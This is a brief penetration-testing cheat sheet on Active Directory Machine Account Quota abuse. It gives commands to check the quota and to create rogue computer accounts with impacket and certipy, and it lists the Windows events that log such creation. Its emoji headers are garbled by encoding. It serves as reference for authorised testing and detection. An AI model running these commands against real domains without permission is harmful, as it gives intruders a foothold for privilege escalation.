πΎ Overview
By default, all users can join up to 10 machines to the domain, this is defined by the MAQ or Machine Account Quota. Thereβs a couple ways you can check this, it needs to be 1 or more.
π Discovery
# Checking the MAQ on a domain-joined Windows machine
Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'# Checking MAQ remotely
nxc ldap [IP] -d [DOMAIN] -u [USER] -p [PASSWORD] -M maq # netexec
bloodyad -d [DOMAIN] -u [USER] -p [PASSWORD] --host [IP] get object 'DC=[DOMAIN],DC=[DOMAIN]' --attr ms-DS-MachineAccountQuota # bloodyADπ Exploitation
If the MAQ is greater than 0, you can create a new machine account on the domain.
# Using impacket
impacket-addcomputer -computer-name '[COMPUTER NAME]$' -computer-pass 'Password123!' -dc-host [IP] -domain-netbios [DOMAIN] '[DOMAIN]/[USER]:[PASSWORD]'
# Using certipy
certipy-ad account create -u "[USERNAME]@[DOMAIN]" -p '[PASSWORD]' -user "[COMPUTER NAME]" -pass 'Password123!' -dns "[HOSTNAME].[DOMAIN]" -dc-ip [IP]π Detection & Evasion
Events 4741(S): A computer account was created, and 645: Computer Account Created are generated when creating a machine account. This will have information about the created machines, and the account which created them.